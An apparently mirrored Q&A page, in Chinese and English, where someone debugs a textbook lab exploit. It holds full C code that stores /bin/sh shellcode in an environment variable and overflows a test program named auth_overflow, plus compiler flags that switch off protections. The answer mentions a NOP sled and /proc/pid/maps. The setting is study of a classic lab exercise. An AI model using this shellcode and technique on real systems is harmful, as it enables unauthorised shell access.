使用环境变量的缓冲区溢出 [英] Buffer overflow using environment variables
问题描述
我正在尝试受黑客:剥削的艺术"一书启发的这段代码.它涉及使用环境变量来利用缓冲区溢出.漏洞利用代码为:
I'm trying this code inspired by the "Hacking: The Art of Exploitation" book. It involves exploiting a buffer overflow using the environment variable. The exploitation code is:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
char shellcode[] = "\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51"
"\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89\xe1\xcd"
"\x80";
int main(int argc, char *argv[]) {
char *env[2] = {shellcode, 0};
unsigned int i, ret;
char *buffer = (char *)malloc(160);
ret = 0xbffffffa - sizeof(shellcode) - strlen("./auth_overflow");
for (i = 0; i < 160; i += 4)
*((unsigned int *)(buffer + i)) = ret;
execle("./auth_overflow", "auth_overflow", buffer, (char *)NULL, env);
free(buffer);
}
问题是基地址 0xbffffffa .我在此处中读到,该地址的原因是因为"Linux内核是这样实现的".仍然无法利用该漏洞,并导致分段错误.
The problem is the base address 0xbffffffa. I read here that the reason for this address is because "the Linux kernel is implemented like so". Still the exploit is not working and resulting in a segmentation fault.
我正在64位计算机上运行内核版本为 3.13.0-83-generic 的 Ubuntu 14.04 ,并且我正在使用以下代码编译漏洞利用代码命令:
I'm running Ubuntu 14.04 with Kernel version 3.13.0-83-generic on a 64-bit machine and I'm compiling the exploitation code using the following command:
gcc -m32 -fno-stack-protector -z execstack -g exploit.c -o exploit
我也禁用了ASLR.
关于如何确定此基址的任何想法?
Any ideas on how to determine this based address?
感谢您的帮助.
推荐答案
进行这种利用的想法是使用在您的实际shellcode之前输入nop sled .这样,如果您的地址近似值很差,那么在执行shellcode之前,有更多机会击中nop.
The idea with such exploitation is to use nop sled before your actual shellcode. That way, event if your address approximation is bad, there's more chance to hit nop, until your shellcode gets executed.
要获取该地址,您可以作弊(作为开始),查看/proc/<<< pid>>/maps 中的内存映射.
To get that address, you can cheat (for a start) looking at memory mappings in /proc/<<pid>>/maps.
这篇关于使用环境变量的缓冲区溢出的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!
